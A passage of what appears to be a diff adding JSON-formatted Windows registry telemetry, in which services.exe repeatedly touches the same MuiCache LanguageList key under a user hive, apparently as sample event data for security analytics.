"{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": 
"C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + 
"event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + 
"timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + 
"process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": 
"C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + 
"event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + 
"timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + 
